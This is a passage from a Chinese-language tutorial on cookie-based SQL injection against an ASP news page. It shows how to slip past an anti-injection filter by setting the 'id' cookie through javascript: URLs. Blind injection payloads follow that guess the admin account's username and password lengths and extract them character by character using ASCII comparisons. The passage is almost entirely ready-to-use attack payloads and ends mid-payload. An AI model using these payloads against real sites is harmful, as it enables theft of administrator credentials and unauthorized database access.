再次提交: javascript:alert(document.cookie="id="+escape("51 and 1=2")); 访问http://localhost/shownews.asp 返回错误,说明我们已经绕过防注入系统的检查,成功注入了。
猜解管理员帐号长度: javascript:alert(document.cookie="id="+escape("51 and (select len(username) from admin)=5"));
猜解管理员密码长度: javascript:alert(document.cookie="id="+escape("51 and (select len(password) from admin)=16"));
猜解username里的内容:
猜解admin表,username字段,第1位对应的ASCII码 javascript:alert(document.cookie="id="+escape("51 and (select asc(mid(username,1,1)) from admin)=97")); (mid(列名,2,1)) (mid(列名,3,1)) ....
猜解password里的内容: 猜解admin表,password字段,第1位对应的ASCII码 javascript:alert(document.cookie="id="+escape("51 and (select asc(mid(password,1,1)) from admin)<97")); (mid(列名,2,1)) (mid(列名,3,1)) ....
小技巧: 可以同时打开两个页面 http://localhost/shownews.asp javascript:alert(document.cookie="id="+escape("51 and